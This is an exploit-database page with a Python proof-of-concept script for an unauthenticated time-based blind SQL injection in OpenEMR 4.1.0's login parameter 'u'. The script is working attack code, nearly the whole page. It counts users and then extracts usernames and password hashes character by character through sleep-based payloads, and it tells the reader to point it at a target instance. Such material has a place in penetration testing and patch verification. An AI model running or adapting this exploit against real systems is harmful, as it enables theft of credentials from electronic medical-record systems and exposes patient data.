Share
## https://sploitus.com/exploit?id=PACKETSTORM:162074
# Exploit Title: OpenEMR 4.1.0 - 'u' SQL Injection  
# Date: 2021-04-03  
# Exploit Author: Michael Ikua  
# Vendor Homepage: https://www.open-emr.org/  
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v4_1_0.zip  
# Version: 4.1.0  
# Original Advisory: https://www.netsparker.com/web-applications-advisories/sql-injection-vulnerability-in-openemr/  
  
#!/usr/bin/env python3  
  
import requests  
import string  
import sys  
  
print("""  
____ ________ _______ __ __ ___ ____   
/ __ \____ ___ ____ / ____/ |/ / __ \ / // / < // __ \\  
/ / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ / / // /_ / // / / /  
/ /_/ / /_/ / __/ / / / /___/ / / / _, _/ /__ __/ / // /_/ /   
\____/ .___/\___/_/ /_/_____/_/ /_/_/ |_| /_/ (_)_(_)____/   
/_/  
____ ___ __ _____ ____ __ _   
/ __ )/ (_)___ ____/ / / ___// __ \ / / (_)   
/ /_/ / / / __ \/ __ / \__ \/ / / / / / / /   
/ /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ /   
/_____/_/_/_/ /_/\__,_/ /____/\___\_\/_____/_/ exploit by @ikuamike   
""")  
  
all = string.printable  
# edit url to point to your openemr instance  
url = "http://192.168.56.106/openemr/interface/login/validateUser.php?u="   
  
def extract_users_num():  
print("[+] Finding number of users...")  
for n in range(1,100):  
payload = '\'%2b(SELECT+if((select count(username) from users)=' + str(n) + ',sleep(3),1))%2b\''  
r = requests.get(url+payload)  
if r.elapsed.total_seconds() > 3:  
user_length = n  
break  
print("[+] Found number of users: " + str(user_length))  
return user_length  
  
def extract_users():  
users = extract_users_num()  
print("[+] Extracting username and password hash...")  
output = []  
for n in range(1,1000):  
payload = '\'%2b(SELECT+if(length((select+group_concat(username,\':\',password)+from+users+limit+0,1))=' + str(n) + ',sleep(3),1))%2b\''  
#print(payload)  
r = requests.get(url+payload)  
#print(r.request.url)  
if r.elapsed.total_seconds() > 3:  
length = n  
break  
for i in range(1,length+1):  
for char in all:  
payload = '\'%2b(SELECT+if(ascii(substr((select+group_concat(username,\':\',password)+from+users+limit+0,1),'+ str(i)+',1))='+str(ord(char))+',sleep(3),1))%2b\''  
#print(payload)  
r = requests.get(url+payload)  
#print(r.request.url)  
if r.elapsed.total_seconds() > 3:  
output.append(char)  
if char == ",":  
print("")  
continue  
print(char, end='', flush=True)  
  
  
try:  
extract_users()  
except KeyboardInterrupt:  
print("")  
print("[+] Exiting...")  
sys.exit()